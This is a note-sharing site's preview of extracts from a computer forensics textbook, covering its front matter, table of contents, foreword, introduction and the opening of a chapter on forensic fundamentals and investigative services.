Search for notes by fellow students, in your own course and all over the country.

Browse our notes for titles which look like what you need, you can preview any of the notes via a sample of the contents. After you're happy these are the notes you're after simply pop them into your shopping cart.

My Basket

Buy These Notes

You have nothing in your shopping cart yet.

Title: COMPUTER FORENSIC
Description: It is very cler notes to learn a subject.It is so easy and it is very clearly written.
Buy These NotesPreview

Document Preview

Extracts from the notes are below, to see the PDF you'll receive please use the links above

Computer Forensics
Second Edition

LIMITED WARRANTY AND DISCLAIMER OF LIABILITY
THE CD-ROM THAT ACCOMPANIES THE BOOK MAY BE USED ON A SINGLE PC
ONLY
...
YOU FURTHER AGREE THAT THIS LICENSE GRANTS PERMISSION TO USE
THE PRODUCTS CONTAINED HEREIN, BUT DOES NOT GIVE YOU RIGHT OF
OWNERSHIP TO ANY OF THE CONTENT OR PRODUCT CONTAINED ON THIS CDROM
...

CHARLES RIVER MEDIA, INC
...
THE AUTHOR AND PUBLISHER
HAVE USED THEIR BEST EFFORTS TO ENSURE THE ACCURACY AND FUNCTIONALITY OF THE TEXTUAL MATERIAL AND PROGRAMS CONTAINED HEREIN
...
THE SOFTWARE
IS SOLD “AS IS” WITHOUT WARRANTY (EXCEPT FOR DEFECTIVE MATERIALS USED
IN MANUFACTURING THE DISK OR DUE TO FAULTY WORKMANSHIP)
...
THIS INCLUDES, BUT
IS NOT LIMITED TO, LOSS OF REVENUE OR PROFIT, OR OTHER INCIDENTAL OR
CONSEQUENTIAL DAMAGES ARISING OUT OF THE USE OF THE PRODUCT
...

THE USE OF “IMPLIED WARRANTY” AND CERTAIN “EXCLUSIONS” VARIES FROM
STATE TO STATE, AND MAY NOT APPLY TO THE PURCHASER OF THIS PRODUCT
...
Vacca

CHARLES RIVER MEDIA, INC
...

Published by Charles River Media, an imprint of Thomson Learning Inc
...

No part of this publication may be reproduced in any way, stored in a retrieval system of any
type, or transmitted by any means or media, electronic or mechanical, including, but not
limited to, photocopy, recording, or scanning, without prior permission in writing from the
publisher
...
info@thomson
...
charlesriver
...

John R
...
Computer Forensics: Computer Crime Scene Investigation, Second Edition
...
Any omission or misuse (of any kind) of service marks or trademarks should not be regarded as intent to infringe on the property of others
...

Library of Congress Cataloging-in-Publication Data
Vacca, John R
...
Vacca
...

p
...

Includes bibliographical references and index
...
with cd-rom : alk
...
Computer security
...
Computer networks--Security measures
...
Forensic sciences
...
Title
...
9
...
8--dc22
2005007521
Printed in the United States of America
07 7 6 5 4 3
CHARLES RIVER MEDIA titles are available for site license or bulk purchase by institutions, user
groups, corporations, etc
...

Requests for replacement of a defective CD-ROM must be accompanied by the original disc,
your mailing address, telephone number, date of purchase and purchase price
...
CRM’s sole obligation to the purchaser is to replace the disc,
based on defective materials or faulty workmanship, but not on the operation or functionality
of the product
...


This page intentionally left blank

Contents

Acknowledgments
Foreword
Introduction
Part I Overview of Computer Forensics Technology
1

xix
xxi
xxv
1

Computer Forensics Fundamentals

3

Introduction to Computer Forensics

4

Use of Computer Forensics in Law Enforcement

8

Computer Forensics Assistance to Human Resources/
Employment Proceedings

9

Computer Forensics Services

10

Benefits of Professional Forensics Methodology

17

Steps Taken by Computer Forensics Specialists

18

Who Can Use Computer Forensic Evidence?

18

Case Histories

24

Case Studies

27

Summary

28

Chapter Review Questions and Exercises

31

Hands-On Projects

33

References

34

vii

viii

Computer Forensics, Second Edition

2

Types of Computer Forensics Technology

35

Types of Military Computer Forensic Technology
Types of Law Enforcement: Computer Forensic Technology

38

Types of Business Computer Forensic Technology

52

Specialized Forensics Techniques

57

Hidden Data and How to Find It

61

Spyware and Adware

61

Encryption Methods and Vulnerabilities

63

Protecting Data from Being Compromised

64

Internet Tracing Methods

65

Security and Wireless Technologies

69

Avoiding Pitfalls with Firewalls

71

Biometric Security Systems

72

Summary

73

Chapter Review Questions and Exercises

77

Hands-On Projects

79

References
3

36

81

Types of Computer Forensics Systems

83

Internet Security Systems

84

Intrusion Detection Systems

91

Firewall Security Systems

99

Storage Area Network Security Systems

108

Network Disaster Recovery Systems

112

Public Key Infrastructure Systems

113

Wireless Network Security Systems

115

Satellite Encryption Security Systems

118

Instant Messaging (IM) Security Systems

125

Net Privacy Systems

126

Identity Management Security Systems

129

Identity Theft

137

Contents

ix

Biometric Security Systems
Homeland Security Systems

143

Summary

145

Chapter Review Questions and Exercises

148

Hands-on Projects

150

References
4

141

151

Vendor and Computer Forensics Services

153

Occurrence of Cyber Crime

154

Cyber Detectives

155

Fighting Cyber Crime with Risk-Management Techniques

156

Computer Forensics Investigative Services

162

Forensic Process Improvement

167

Course Content

176

Case Histories

180

Summary

182

Chapter Review Questions and Exercises

184

Hands-On Projects

186

References

186

Part II Computer Forensics Evidence and Capture
5

Data Recovery

189
191

Data Recovery Defined

191

Data Backup and Recovery

192

The Role of Backup in Data Recovery

200

The Data-Recovery Solution

203

Hiding and Recovering Hidden Data

206

Case Histories

209

Summary

212

Chapter Review Questions and Exercises

214

Hands-On Projects

216

References

216

x

Computer Forensics, Second Edition

6

Evidence Collection and Data Seizure

217

Why Collect Evidence?
Collection Options

218

Obstacles

218

Types of Evidence

219

The Rules of Evidence

220

Volatile Evidence

223

General Procedure

224

Collection and Archiving

224

Methods of Collection

225

Artifacts

226

Collection Steps

226

Controlling Contamination: The Chain of Custody

228

Reconstructing the Attack

229

Summary

229

Chapter Review Questions and Exercises

231

Hands-on Projects

232

References
7

217

233

Duplication and Preservation of Digital Evidence

235

Preserving the Digital Crime Scene
Computer Evidence Processing Steps

240

Legal Aspects of Collecting and Preserving Computer Forensic Evidence

247

Summary

252

Chapter Review Questions and Exercises

254

Hands-on Projects

255

References
8

238

256

Computer Image Verification and Authentication

257

Special Needs of Evidential Authentication

258

Practical Considerations

264

Contents

xi

Practical Implementation

265

Summary

268

Chapter Review Questions and Exercises

271

Hands-on Projects

273

References

273

Part III Computer Forensics Analysis
9

Discovery of Electronic Evidence

275
277

Electronic Document Discovery: A Powerful New Litigation Tool
Summary

281

Chapter Review Questions and Exercises

283

Hands-on Projects

285

References
10

278

285

Identification of Data

287

Timekeeping
Forensic Identification and Analysis of Technical Surveillance Devices

291

Summary

297

Chapter Review Questions and Exercises

299

Hands-on Projects

300

References
11

288

301

Reconstructing Past Events

303

How to Become a Digital Detective

304

Useable File Formats

305

Unusable File Formats

305

Converting Files

306

Summary

309

Chapter Review Questions and Exercises

310

Hands-on Projects

312

References

313

xii
12

Computer Forensics, Second Edition

Networks

315

Network Forensics Scenario

316

A Technical Approach

316

Destruction of Email

319

Damaging Computer Evidence

321

Tools Needed for Intrusion Response to the Destruction of Data

323

System Testing

324

Summary

326

Chapter Review Questions and Exercises

328

Hands-on Projects

330

References

331

Part IV Countermeasures: Information Warfare
13

Fighting Against Macro Threats: Defensive Strategies
for Governments and Industry Groups

333
335

Is the U
...
Government Prepared for Information Warfare?
Are Other Governments Prepared for Information Warfare?

339

What Industry Groups Have Done to Prepare for Information Warfare

341

Strategic Diplomacy and Information Warfare

344

The Role of International Organizations

354

The Role of Global Military Alliances

359

Marshall Law and Cyberspace

361

The Super Cyber Protection Agencies

363

Summary

365

Chapter Review Questions and Exercises

367

Hands-on Projects

370

References
14

335

370

The Information Warfare Arsenal and Tactics of the Military

371

Overview of Military Tactics

376

Offensive Ruinous IW Tools and Tactics

378

Offensive Containment IW Tools and Tactics

380

Contents

xiii

Defensive Preventive IW Tools and Tactics
Defensive Ruinous IW Tools and Tactics

385

Defensive Responsive Containment IW Tools and Tactics

386

Countering Sustained Terrorist IW Tactics

389

Dealing with Random Terrorist IW

394

Summary

407

Chapter Review Questions and Exercises

410

Hands-on Projects

412

References
15

384

413

The Information Warfare Arsenal and Tactics of Terrorists
and Rogues

415

The Terrorist Profile
Why Terrorists and Rogues Have an Advantage in IW

424

The Dark World of the Cyber Underground

430

The Criminal Café in Cyberspace

433

The Super Computer Literate Terrorist

438

The New Security Professionals

440

The Middle East Cyberwar

441

The New Tools of Terrorism

444

Why Tools Are Easy to Get and Use

452

Why Nasty People Are So Hard to Track Down and Capture

453

The IW Games

459

Summary

462

Chapter Review Questions and Exercises

465

Hands-on Projects

467

References
16

421

468

The Information Warfare Arsenal and Tactics of Private Companies

469

Surviving Offensive Ruinous IW

476

Surviving Offensive Containment IW

478

Participating in Defensive Preventive IW Planning

480

xiv

Computer Forensics, Second Edition

Benefiting from and Surviving Defensive Ruinous IW
Benefiting from and Surviving Defensive Responsive Containment IW

484

Protection Against Random Terrorist IW Tactics

487

What to Do When Terrorists Keep Attacking

490

Countering Sustained Rogue IW

492

Protection Against Random Rogue IW

493

Keeping the Amateur Rogue out of the Cyberhouse

501

Summary

501

Chapter Review Questions and Exercises

503

Hands-on Projects

505

References
17

482

506

The Information Warfare Arsenal of the Future

507

Weapons of the Future
The Global Positioning System

522

Snoop, Sniff, and Snuff Tools

527

Email Wiretaps Like Carnivore Can Steal Sensitive Correspondence

529

IW Weapons of the Future

532

Nanotechnology

538

Summary

543

Chapter Review Questions and Exercises

545

Hands-on Projects

547

References
18

509

547

Surveillance Tools for Information Warfare of the Future

549

Monitoring Everything

549

Cyber Surveillance

552

The Cyber Footprint and Criminal Tracking

553

The Implications of Cookies and Integrated Platforms

564

Wintel Inside, or How Your Computer Is Watching You

566

Data Mining for What?

569

The Internet Is Big Brother

577

Contents

xv

The Wireless Internet: Friend or Foe?
Summary

580

Chapter Review Questions and Exercises

582

Hands-on Projects

583

References
19

579

584

Civilian Casualties: The Victims and Refugees of
Information Warfare

585

What the Cyber Masses Have to Lose

587

The Destruction of Personal Assets in IWs

597

Short- and Long-Term Personal Economic Impact on Cyber Citizens

601

The Violation of Privacy During Information Wars

602

The Individual Exposed

604

Identity Theft

606

Monitoring Private Affairs in Cyberspace

609

The New Order and State Medical ID Cards

613

Big Brother Is Here and Is Staying

616

Summary

618

Chapter Review Questions and Exercises

620

Hands-on Projects

622

References

623

Part V Advanced Computer Forensics Systems and Future Directions
20

Advanced Computer Forensics

625
627

Advanced Encryption: The Need to Conceal

628

Advanced Hacking

640

Advanced Tracker Hackers

647

The Problems of the Present

663

Summary

666

Chapter Review Questions and Exercises

669

Hands-on Projects

670

References

671

xvi
21

Computer Forensics, Second Edition

Summary, Conclusions, and Recommendations

673

Summary

674

Conclusions

681

Recommendations

684

Final Word: Computer Forensic Needs and Challenges

699

Chapter Review Questions and Exercises

700

References

703

Appendix A Frequently Asked Questions

705

What Is Computer Forensics?

705

Why Computer Forensics?

705

What Is Data Recovery?

705

Are There Instances When Data Cannot Be Recovered?

706

Appendix B Computer Forensics Resources

709

General Forensics Resources

709

Computer Crime

711

File Formats and Extensions

711

Cryptography and Steganography

712

Appendix C Links to Computer Forensics and Related Law
Enforcement Web Pages

713

Law Enforcement Links

713

Organizations

714

Mailing Lists

714

USDOJ Guidelines for Searching and Seizing Computers

715

Computer Forensic and Security Software Available Free of
Charge to Law Enforcement Agencies

715

Miscellaneous

715

Contents

Appendix D More Computer Forensics Cases

xvii
717

Case Study 1: Lost Files

717

Case Study 2: Corrupted Files

718

Case Study 3: Disappearing Files

718

Case Study 4: Computer Forensics

718

Case Study 5: Forensic Accounting

719

Case Study 6: Corporate Investigation into PC Pornography

719

Case Study 7: Data Recovery

719

Case Study 8: Industrial Espionage

720

Case Study 9: Family Members Bolt

720

Case Study 10: Former Employer

720

Case Study 11: Goods Left to Rot

721

Case Study 12: Managers Start New Company

721

Case Study 13: Family Member Steals Clients

721

Case Study 14: Erased Email

721

Case Study 15: Bank Suspects

722

Case Study 16: Former Managers

722

Case Study 17: Former Catalog Designers

722

Case Study 18: Model Pursued

722

Case Study 19: Encrypted Mail

723

Case Study 20: Two Attorneys Can’t Speak Civilly

723

Case Study 21: Big Real Estate Deal

723

Case Study 22: Doctor Accused

723

Case Study 23: Former Employee Claims

724

Case Study 24: Ex-Partner Claims

724

Case Study 25: Former Manager

724

xviii

Computer Forensics, Second Edition

Appendix E Answers to Review Questions and Exercises,
Hands-on Projects, Case Projects, and
Optional Team Case Projects by Chapter

725

Appendix F Checklists by Chapter

747

Appendix G About the CD-ROM

781

Appendix H Glossary of Terms and Acronyms

791

Index

819

Acknowledgments

here are many people whose efforts on this book have contributed to its
successful completion
...

A very special thanks to my publisher, David Pallai, without whose initial
interest and support this book would not have been possible, for his guidance and
encouragement over and above the business of being a publisher
...
Thanks to my copyeditor, Ruth Saavedra, whose fine editorial work has been invaluable
...
Finally, a special thanks to Michael Erbschloe, who wrote the
Foreword for this book
...

Finally, I wish to thank the organizations and individuals who granted me permission to use the research material and information necessary for the completion
of this book
...
Criminals, fraudsters, and terrorists seem to strike whenever
there is an opportunity
...
The FBI, through the Internet Crime Complaint Center (IC3), had received reports of Web sites being
established purportedly to assist with collection and relief efforts
...
A fraudulent relief donation
Web site has also been detected containing an embedded Trojan exploit which can
infect the user’s computer with a virus if accessed
...
In WEB-SNARE, more than 150 investigations were successfully advanced, in which more than 150,000 victims lost more than $215 million
...
Many of the investigations included in WEBSNARE could potentially be characterized as Identity Theft, or related to Identity
Theft
...
In those initiatives, more than 200 investigations were coordinated among the
various law enforcement agencies, resulting in arrests and/or charges of more than
250 individuals for engaging in a variety of cyber crimes including Identity Theft
...
Identifying such

C

xxi

xxii

Computer Forensics, Second Edition

trends, as well as formulating an aggressive and proactive counter-attack strategy,
remains a fundamental objective of the FBI’s Cyber Division
...
Once that information is obtained, they use their identities to post auctions on well-known
auction sites
...
S and abroad, and the items sold are never delivered
...
The
compromised e-commerce company was contacted via email by the hackers who
demanded money to keep them from publicly posting the obtained information on
the Internet
...
Through investigative efforts, these complaints were all linked to the hacking of the e-commerce company's system
...

Computer crimes are impacting society in numerous ways and there is a lot of
work for the good guys
...
The soaring increase in the number of Internet users
combined with the constant computerization of business processes has created new
opportunities for computer criminals and terrorists
...

We need to train at least 100,000 more computer crime fighters in order to
stem the global tide of computer attacks
...
My response has
constantly been learn, study, train, and move forward
...

Computer Forensics is an excellent book for trained law enforcement personnel
who desire to learn more about investigating and fighting computer crimes
...


Foreword

xxiii

It is also important that computer security personnel expand their understanding of forensic processes and keep their understanding of investigative and
prevention procedures up to date
...

John Vacca had made an excellent contribution to the computer forensics field
...

Michael Erbschloe
Security Consultant and Author
St
...
It has made little difference that the Bush
administration pledged billions in additional federal funding to combat security breaches after the 9-11 terrorists attacks
...

Fortunately, the computer security field is also progressing at a brisk rate
...


C

GROWING PROBLEM
The numbers are chilling
...

So what’s going on? It doesn’t take a computer engineer or computer scientist
to learn hacking fundamentals
...
Corporations and the federal government are just beginning to
realize that securing their computer networks is critical
...
Colleges have finally started
to offer courses and concentrations in computer security and forensics, but it remains difficult to find degree programs in these disciplines
...

xxv

xxvi

Computer Forensics, Second Edition

The fascinating part of the science is that the computer evidence is often transparently
created by the computer’s operating system without the knowledge of the computer
operator
...
To find it, special
forensic software tools and techniques are required
...
Industry, on the other hand, has
been taking computer forensics seriously for several years
...
The
problem is, industry doesn’t know which computer forensics issues to focus on
...
Academics are
teaching the subjects, but most lack real-world experience, which is critical when training students
...

Times Are Changing
There’s an old saying, “If you wait long enough, it’s bound to change
...
Not only will more techies be concentrating on computer forensics, but also attorneys and judges will be taking courses
in the subject
...

On the academic front, full-fledged degree tracks in computer forensics are
being developed
...

Where are the jobs? Government agencies, such as the Department of Defense,
FBI, CIA, NSA, and U
...
Postal Service need computer forensics specialists
...
On the corporate front, all companies (especially large and mid-size ones with
a Web presence) will have serious computer forensics needs
...


PURPOSE
The purpose of this book is to show experienced (intermediate to advanced) computer forensics, security, and law enforcement professionals how to analyze and con-

Introduction

xxvii

duct a computer forensics examination and report the findings that will lead to the incarceration of the perpetrators
...
Through extensive hands-on examples (field and trial experiments) and
case studies, you will gain the knowledge and skills required to master the deployment
of information warfare countermeasures to thwart potential attacks
...
In addition to advanced computer forensics
technology considerations in commercial organizations and governments, the book
addresses, but is not limited to, the following line items as part of the discovery of
electronic evidence:
The CD-ROM that accompanies this book contains the latest and best computer forensics software tools and documentation
...

Chapters on how to gain practical experience in analyzing the security risks and
information warfare countermeasures that need to be addressed in your organization also include maintaining strong authentication and authenticity, preventing eavesdropping, retaining integrity of information, evaluating the
strength of user passwords, selecting a firewall topology, and evaluating computer and hacker ethics
...
This new area of knowledge is now being researched,
organized, and taught
...


xxviii Computer Forensics, Second Edition

TARGET AUDIENCE
With regard to computer forensics, the book is primarily targeted at those in government and law enforcement who require the fundamental skills to develop and
implement security schemes designed to protect their organizations’ information
from attacks, including managers, network and systems administrators, technical
staff, and support personnel
...


ORGANIZATION OF THIS BOOK
This book is organized into six parts, including the appendixes (which include a
glossary of computer forensic and information warfare terms)
...

Chapter 1, Computer Forensics Fundamentals, provides an overview of computer forensics types and techniques and their electronic evidence and capture
...
In other words, it covers security and
computer evidence issues associated with Windows NT, Windows XP, and 2003
...
Answering the questions raised in this chapter
will assist managers in creating sound corporate security policies and practices that
support the following computer forensics systems: Internet security, intrusion detection, firewall security, storage area networks security, network disaster recovery,
public key infrastructure security, wireless network security, satellite encryption
security, instant messaging (IM) security, Net privacy, ID management security, ID
theft prevention, biometric security, and homeland security
...
In addition, this chapter covers
the following computer forensic services: forensic incident response, evidence collection, forensic analysis, expert witness, forensic litigation and insurance claims
support, training, and forensic process improvement
...

Chapter 5, Data Recovery, answers many questions about the ins and outs of
data recovery as it relates to computer forensics
...
Not
everything is covered here—it should be used as a guide only, and you should seek
further information for your specific circumstances
...
When it comes to computer evidence processing, Murphy is always looking over your shoulder
...

Chapter 8, Computer Image Verification and Authentication, discusses the
overall security of a computer image verification and authentication system and
how it rests with the combination of security measures
...

Chapter 9, Discovery of Electronic Evidence, addresses the process of information discovery
...

Chapter 10, Identification of Data, specifically focuses on the long-recognized
value of deterrence—through threat of retaliation—as an effective means of defense
...

Chapter 11, Reconstructing Past Events, illustrates the reconstruction of past
events with as little distortion or bias as possible
...

Network forensics is the principle of reconstructing the activities leading up to an
event and determining the answer to “What did they do?” and “How did they do it?”
Part IV: Countermeasures: Information Warfare
Part IV discusses how to fight against macro threats (defensive strategies for governments and industry groups), the information warfare arsenal and tactics of the
military, the information warfare arsenal and tactics of terrorists and rogues, the
information warfare arsenal and tactics of private companies, the information
warfare arsenal of the future, surveillance tools for information warfare of the
future, and civilian causalities (the victims and refugees of information warfare)
...
S
...

Chapter 14, The Information Warfare Arsenal and Tactics of the Military, focuses on two goals
...
Second, you need to build a firm foundation on which you can
make steady progress by continually raising the cost of mounting an attack and
mitigating the expected damage of the information warfare arsenal and tactics of
the military
...
S
...

Chapter 16, The Information Warfare Arsenal and Tactics of Private Companies, deals with the information warfare tools and strategies of private companies
and how they’re used against the aggressors
...

Chapter 17, The Information Warfare Arsenal of the Future, discusses how the
increasing dependence on sophisticated information systems brings with it an increased vulnerability to hostile elements, terrorists among them, in dealing with the
information warfare arsenal of the future
...

Chapter 19, Civilian Casualities: The Victims and Refugees of Information
Warfare, considers the application of civilian information operations (CIOs) to the
conventional warfare environment
...

Part V: Advanced Computer Forensics Systems and Future Directions
Finally, Part V discusses advanced computer forensics, with a summary, conclusions, and recommendations
...

Chapter 21, Summary, Conclusions, and Recommendations
...
This final chapter is concerned with how to conduct a relevant and meaningful review of computer forensic analysis software tools
...
Finally, this chapter recommends the establishment of computer forensics
standards for the exchange of digital evidence between sovereign nations and is intended to elicit constructive discussions regarding digital evidence
...
Appendix A is a list of frequently asked questions
...
Appendix C contains links to computer forensics and
related law enforcement Web pages
...
Appendix E contains answers to review questions and exercises,
hands-on projects, case projects, and optional team case projects by chapter
...
Appendix G contains all of the files that are
on the CD-ROM
...


xxxii

Computer Forensics, Second Edition

CONVENTIONS
This book uses several conventions to help you find your way around and to help
you find important sidebars, facts, tips, notes, cautions, and warnings
...
They alert you to critical information and warn you about problems
...
Vacca
jvacca@hti
...


P

This page intentionally left blank

1

Computer Forensics
Fundamentals

lectronic evidence and information gathering have become central issues in
an increasing number of conflicts and crimes
...
However, for many years, law enforcement officers have been seizing data media and computers themselves, as they have
become smaller and more ubiquitous
...
More recently, investigators have found ways of collecting evidence
from remote computers to which they do not have immediate physical access, provided such computers are accessible via a phone line or network connection
...

These procedures form part of what is called computer forensics, though some
people also use the term to include the use of computers to analyze complex data
(for example, connections between individuals by examination of telephone logs or
bank account transactions)
...

So, what actually is computer forensics? Computer forensics is about evidence
from computers that is sufficiently reliable to stand up in court and be convincing
...
On the other hand, you may want one to criticize the work
of others
...


E

3

4

Computer Forensics, Second Edition

INTRODUCTION TO COMPUTER FORENSICS
Computer forensics, also referred to as computer forensic analysis, electronic discovery, electronic evidence discovery, digital discovery, data recovery, data discovery, computer analysis, and computer examination, is the process of methodically
examining computer media (hard disks, diskettes, tapes, etc
...
A thorough analysis by a skilled examiner can result in the reconstruction of the activities
of a computer user
...
Computer evidence can be useful in
criminal cases, civil disputes, and human resources/employment proceedings
...
It’s
also more difficult to completely remove information than is generally thought
...

Computer forensics, although employing some of the same skills and software
as data recovery, is a much more complex undertaking
...
In computer forensics, the goal is to retrieve the data and
interpret as much information about it as possible
...
Computer crime has forced the computer and law enforcement
professions to develop new areas of expertise and avenues of collecting and analyzing evidence
...
The process of acquiring, examining, and applying digital evidence is crucial
to the success of prosecuting a cyber criminal
...
To effectively combat cyber
crime, greater emphasis must be placed in the computer forensic field of study,
including but not limited to financial support, international guidelines and laws,
and training of the professionals involved in the process, as well as the following
subject matter:
Computer crime
The computer forensic objective
The computer forensic priority
The accuracy versus speed conflict
The need for computer forensics
The double tier approach

Computer Forensics Fundamentals

5

Requirements for the double tier approach
The computer forensics specialist

Computer Crime
According to industry analysts, there are currently 657 million people online worldwide
...
This represents a lot of
data interchange
...

Computers can be involved in a wide variety of crimes including white-collar
crimes, violent crimes such as murder and terrorism, counterintelligence, economic espionage, counterfeiting, and drug dealing
...
The Internet has made targets much more accessible, and the
risks involved for the criminal are much lower than with traditional crimes
...
One hears of such technological crimes almost daily, thus creating a perception of lawlessness in the cyber
world
...
Out of the 849 organizations
that responded to the survey, 30% claimed theft of proprietary information, 23%
reported sabotage of data or their networks, 35% experienced system penetration
from an outside source, and 12% claimed financial fraud
...
Fifty-nine percent
of the organizations involved in the survey reported employees having unauthorized access to corporate information
...
An alarming 74% of their workload is centered on whitecollar crime
...
These are high-dollar crimes made easy by technology
...
As shown by this survey, computer crime is
widespread and has infiltrated areas unimaginable just a few years ago
...
It is no
doubt considerably higher today
...
Technology has
brought this field of study to the forefront
...
A computer can be the
target of the crime, it can be the instrument of the crime, or it can serve as an evidence repository storing valuable information about the crime
...
It can be the “smoking gun” serving as the instrument of the crime
...
For
example, a hacker may use the computer as the tool to break into another computer
and steal files, then store them on the computer
...

Applying information about how the computer was used in the crime also
helps when searching the system for evidence
...
If the computer was the target of the crime, such
as an intrusion, audit logs and unfamiliar programs should be checked
...

With the size of hard drives these days, it can take a very long time to check and analyze every piece of data a computer contains
...

The Computer Forensic Objective
The objective in computer forensics is quite straightforward
...
The key phrase here is useable as evidence in a court of law
...

The Computer Forensic Priority
Computer forensics is concerned primarily with forensic procedures, rules of evidence, and legal processes
...
Therefore, in contrast to all other areas of computing, where speed is the main concern, in
computer forensics the absolute priority is accuracy
...


Computer Forensics Fundamentals

7

Accuracy Versus Speed
In this seemingly frenetic world where the precious resource of time is usually at a
premium, pressure is heaped upon you to work as fast as possible
...

In computer forensics, as in any branch of forensic science, the emphasis must
be on evidential integrity and security
...
Such guidelines do not encompass the
taking of shortcuts, and the forensic practitioner accepts that the precious resource
of time must be expended in order to maintain the highest standards of work
...
The computer forensics specialist will take several careful steps to identify and
attempt to retrieve possible evidence that may exist on a subject computer system:
1
...


3
...

5
...


7
...


Protect the subject computer system during the forensic examination from
any possible alteration, damage, data corruption, or virus introduction
...
This includes existing normal files,
deleted yet remaining files, hidden files, password-protected files, and encrypted files
...

Reveal (to the extent possible) the contents of hidden files as well as temporary
or swap files used by both the application programs and the operating system
...

Analyze all possibly relevant data found in special (and typically inaccessible)
areas of a disk
...

Print out an overall analysis of the subject computer system, as well as a
listing of all possibly relevant files and discovered file data
...

Provide expert consultation and/or testimony, as required [2]
...

Criminal Prosecutors use computer evidence in a variety of crimes where incriminating documents can be found: homicides, financial fraud, drug and
embezzlement record-keeping, and child pornography
...
Insurance companies may be able to mitigate costs by using discovered
computer evidence of possible fraud in accident, arson, and workman’s compensation cases
...

Law enforcement officials frequently require assistance in pre-search warrant
preparations and post-seizure handling of the computer equipment
...

Individuals sometimes hire computer forensics specialists in support of possible
claims of wrongful termination, sexual harassment, or age discrimination [2]
...
If the computer and its contents are examined (even if very briefly) by anyone other than a trained and experienced computer
forensics specialist, the usefulness and credibility of that evidence will be tainted
...
There are an increasing number of people who claim to be experts in the
field
...
There is
far more to proper computer forensic analysis than the ability to retrieve data, especially when a criminal case is involved
...

The bottom line is that you will be retaining the services of an individual who
will likely be called to testify in court to explain what he or she did to the computer

Computer Forensics Fundamentals

9

and its data
...
Make sure you find someone
who not only has the expertise and experience, but also the ability to stand up to the
scrutiny and pressure of cross-examination
...
Computers can contain evidence in many types of human resources proceedings, including
sexual harassment suits, allegations of discrimination, and wrongful termination
claims
...
However, due to the ease with which computer
data can be manipulated, if the search and analysis is not performed by a trained computer forensics specialist, it could likely be thrown out of court
...
An unfortunate concern today is the possibility that data
could be damaged, destroyed, or misappropriated by a discontented individual
...
In this way, should the employee choose to do anything to that
data before leaving, the employer is protected
...
This method can
also be used to bolster an employer’s case by showing the removal of proprietary information or to protect the employer from false charges made by the employee
...
This includes situations
where files have been deleted, disks have been reformatted, or other steps have
been taken to conceal or destroy the evidence
...
Likewise, when people try to destroy incriminating evidence contained on a computer (from harassing memos to stolen technology), they leave behind vital clues
...
Thus, computer data evidence is quickly becoming a
reliable and essential form of evidence that should not be overlooked
...
Your forensics professionals should be
able to successfully perform complex evidence recovery procedures with the skill
and expertise that lends credibility to your case
...
Your computer forensics experts, following federal guidelines, should act as this representative,
using their knowledge of data storage technologies to track down evidence [3]
...
See
Chapter 6, “Evidence Collection and Data Seizure,” for more detailed information
...
Your computer forensics experts should acknowledge
both of these concerns by making an exact duplicate of the needed data
...
See Chapter 7, “Duplication and Preservation of
Digital Evidence,” for more detailed information
...
The ability to recover lost evidence is made possible by the expert’s advanced understanding of storage technologies
...
Although the message is inaccessible to the user, your
experts should be able to recover it and locate relevant evidence
...

Document Searches
Your computer forensics experts should also be able to search over 200,000 electronic
documents in seconds rather than hours
...

Media Conversion
Some clients need to obtain and investigate computer data stored on old and unreadable devices
...


12

Computer Forensics, Second Edition

Expert Witness Services
Computer forensics experts should be able to explain complex technical processes in
an easy-to-understand fashion
...


PROVIDE EXPERT CONSULTATION AND
EXPERT WITNESS SERVICES
C OMPUTERS
Expert Testimony

Has testified multiple times as an expert witness in computers and computer
forensics in circuit court
Regularly testify as an expert witness in computers and computer forensics in
federal court for U
...
attorney’s offices
Computer Expertise

Belongs to the Computer Crime Investigators Association
Trained in the forensic examination of computers (PC & Mac), having conducted examinations in countless cases including child exploitation, homicide,
militia, software piracy, and fraud
Has testified in state and federal courts as an expert in computers, computer
forensics, the Internet, and America Online; often as an expert witness for U
...

attorney’s offices
Is thoroughly familiar with both computer hardware and software, having written software and repaired and assembled computers
Teaches computer crime investigation, including computer search and seizure,
for the Institute of Police Technology and Management
Regularly consults with law enforcement officers in the search and seizure of
computers
Has provided forensic training to numerous law enforcement officers and corporate security officers
Regularly consulted by other forensic examiners for advice in difficult cases
Training Given as Expert in Computer Crimes

Law Enforcement and Corrections Technology Symposium and Exhibition
Bureau of Justice Statistics/Justice Research Statistics Association

Computer Forensics Fundamentals

13

E LECTRONIC S URVEILLANCE
Theft by employees or others
Time
Property
Propriety information and trade secrets
Embezzlement
Inappropriate employee actions
Burglary
Your computer forensics expert’s experience should include installing cameras in every
imaginable location (indoors and outdoors, offices, homes, warehouses, stores, schools,
or vehicles) for every conceivable crime (theft, burglaries, homicides, gambling, narcotics, prostitution, extortion, or embezzlement) under every conceivable circumstance
(controlled settings, hostage crisis, or court-ordered covert intrusion)
...
This even includes situations where employees may be misusing company computers
...


C HILD E XPLOITATION
Child sexual exploitation
Child pornography
Manufacture
Use
Sale
Trading
Collection
Child erotica
Use of computers in child exploitation
Search and seizure
Victim acquisition
Behavior of preferential and situational offenders
Investigation
Proactive
Reactive [4]

14

Computer Forensics, Second Edition

Computer Evidence Service Options
Your computer forensics experts should offer various levels of service, each designed to suit your individual investigative needs
...
They must be
able to provide clean rooms and ensure that all warranties on your equipment will
still be valid following their services
...
While on-site, the experts should
quickly be able to produce exact duplicates of the data storage media in question
...
Your experts should also be able to help
federal marshals seize computer data and be very familiar with the Federal Guidelines for Searching and Seizing Computers
...
They should be
able to work on it without interruption until your evidence objectives are met
...
M
...
M
...
Priority service typically cuts your turnaround time in half
...
M
...
M
...
Weekend service depends on the availability of computer forensics experts
...
These
services include
Analysis of computers and data in criminal investigations
On-site seizure of computer data in criminal investigations
Analysis of computers and data in civil litigation
...
Files may be accidentally deleted
...
Computer viruses may corrupt files
...
Disgruntled employees may try to destroy your files
...
You may think it’s lost forever, but computer forensics experts should be able to employ the latest tools and techniques to
recover your data
...
The advanced tools that computer forensics experts utilize
allow them to find your files and restore them for your use
...

Advise You on How to Keep Your Data and Information Safe from
Theft or Accidental Loss

Business today relies on computers
...
Equally threatening, but far less considered, are unintentional data losses caused by accidental deletion, computer hardware and software crashes, and accidental modification
...
The experts can also thoroughly clean
sensitive data from any computer system you plan on eliminating
...

Computer forensics experts should survey your business and provide guidance for
improving the security of your information
...

Examine a Computer to Find Out What Its User Has Been Doing

Whether you’re looking for evidence in a criminal prosecution, looking for evidence
in a civil suit, or determining exactly what an employee has been up to, your computer forensics experts should be equipped to find and interpret the clues that have
been left behind
...

As previously mentioned, your computer forensics experts should provide complete forensic services
...

